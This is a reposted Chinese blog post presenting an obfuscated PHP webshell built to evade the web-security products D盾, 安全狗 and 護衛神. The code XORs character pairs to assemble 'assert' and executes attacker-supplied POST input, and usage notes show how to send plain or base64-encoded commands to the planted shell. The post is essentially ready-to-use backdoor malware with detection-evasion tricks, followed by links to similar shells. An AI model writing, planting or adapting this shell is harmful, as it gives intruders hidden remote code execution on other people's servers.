免殺PHP一句話一枚

本文轉載自查看原文 2019-09-28 09:04 1487

免殺PHP一句話shell，利用隨機異或免殺D盾，免殺安全狗護衛神等

<?php
class VONE {
 function HALB() {
 $rlf = 'B' ^ "\x23";
 $fzq = 'D' ^ "\x37";
 $fgu = 'h' ^ "\x1b";
 $sbe = 'R' ^ "\x37";
 $gba = 'H' ^ "\x3a";
 $oya = 'Y' ^ "\x2d";
 $MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;
 return $MWUC;}function __destruct() {
 $RNUJ = $this->HALB();
 @$RNUJ($this->HY);}}
$vone = new VONE();
@$vone->HY = isset($_GET['id']) ? base64_decode($_POST['mr6']) : $_POST['mr6'];
?>

使用說明

是否傳入id參數決定是否把流量編碼

http://www.xxx.com/shell.php  
POST: mr6=phpinfo();  //與普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx隨便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64編碼

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 【技術分享】assert免殺一句話 PHP一句話過狗、衛士、D盾等免殺思路！ PHP一句話木馬Webshell變形免殺總結免殺PHP一句話木馬，人才太多了 PHP一句話木馬 PHP一句話 PHP 一句話木馬 php一句話木馬一句話shell【php】 PHP一句話木馬